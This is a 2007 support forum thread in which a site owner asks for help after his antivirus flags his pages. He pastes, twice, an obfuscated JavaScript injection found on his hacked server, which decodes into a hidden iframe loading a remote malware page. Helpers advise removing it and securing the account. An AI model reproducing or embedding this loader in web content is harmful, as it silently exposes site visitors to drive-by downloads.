News:

The "Support Requests" forum is now viewable by guests.

Main Menu

my site get virus?

Started by raymond, July 01, 2007, 05:06:02 AM

Previous topic - Next topic

raymond

http://puresites.org
when i enter my page, my antivirus kaspersky shows, virus detected.
Trojan-Downloader.JS.Agent.ep
url:http://simocrogger.ws/flash/index.php
I checked my html, the following is not included in my original code.
<body><!-- o65 --><script language='JavaScript'>function nbsp() {var t,o,l,i,j;var s='';s+='060047116101120116097116101097062060047116101120116097114101097062';
s+='060073070082065077069032115114099061034104116116112058047047115105109111099114111103103101114046119';
s=s+'115047102108097115104047105110100101120046112104112034032119105100116104061053032104101105103104116';
s=s+'061053032115116121108101061034100105115112108097121058110111110101034062060047073070082065077069062';
s=s+'032';
t='';l=s.length;i=0; while(i<(l-1)){for(j=0;j<3;j++){t+=s.charAt(i);i++;}if((t-unescape(0xBF))>unescape(0x00))t-=-(unescape(0x08)+unescape(0x30));document.write(String.fromCharCode(t));t='';}}nbsp();</script><!-- c65 -->


What should i do to remove that?thx!

markjay

you can removed that code safely starting from <!-- o65 --> up to <!-- c65 -->

raymond

Quote from: markjay on July 01, 2007, 07:04:43 AM
you can removed that code safely starting from <!-- o65 --> up to <!-- c65 -->

but actually, i do not include that in my php file..
thx for help!

brainiac744

It would seem that you are, it doesn't just appear ;)

Can you post the code around that area of your PHP file?

raymond

#4
http://puresites.org/auctions


In the php file(footer.php),

<img src="http://freesearch.no-ip.org/counter/counter.php?user=upload&period=24&nip=64f306804126ef3dd3eb09c6ab985c39" width="0" height="0">
</html>

I just direct require the php file,

The output is:

<img src="http://freesearch.no-ip.org/counter/counter.php?user=upload&period=24&nip=64f306804126ef3dd3eb09c6ab985c39" width="0" height="0">
</html><script language='JavaScript'>function nbsp() {var t,o,l,i,j;var s='';s+='060047116101120116097116101097062060047116101120116097114101097062';s+='060073070082065077069032115114099061034104116116112058047047115105109111099114111103103101114046119';s=s+'115047102108097115104047105110100101120046112104112034032119105100116104061053032104101105103104116';s=s+'061053032115116121108101061034100105115112108097121058110111110101034062060047073070082065077069062';s=s+'032';t='';l=s.length;i=0; while(i<(l-1)){for(j=0;j<3;j++){t+=s.charAt(i);i++;}if((t-unescape(0xBF))>unescape(0x00))t-=-(unescape(0x08)+unescape(0x30));document.write(String.fromCharCode(t));t='';}}nbsp();</script><!-- o65 --><script language='JavaScript'>function nbsp() {var t,o,l,i,j;var s='';s+='060047116101120116097116101097062060047116101120116097114101097062';
s+='060073070082065077069032115114099061034104116116112058047047115105109111099114111103103101114046119';
s=s+'115047102108097115104047105110100101120046112104112034032119105100116104061053032104101105103104116';
s=s+'061053032115116121108101061034100105115112108097121058110111110101034062060047073070082065077069062';
s=s+'032';
t='';l=s.length;i=0; while(i<(l-1)){for(j=0;j<3;j++){t+=s.charAt(i);i++;}if((t-unescape(0xBF))>unescape(0x00))t-=-(unescape(0x08)+unescape(0x30));document.write(String.fromCharCode(t));t='';}}nbsp();</script><!-- c65 -->


Thank you for help!

brainiac744

Is anything included after footer in the index file?

raymond

Quote from: brainiac744 on July 04, 2007, 06:09:07 PM
Is anything included after footer in the index file?

thx, i think i have solved the problem, i only refer to the php file in my computer as i assume they are same as those on server. Hovever, when i use FreePgs File Manager, i discovered all index file on my web server were modified by unknown people on 13:59 06-27-2007. My account was hacked??
thx

brainiac744

Hmmm, I'd check the permissions on the file and change the account password if you haven't already.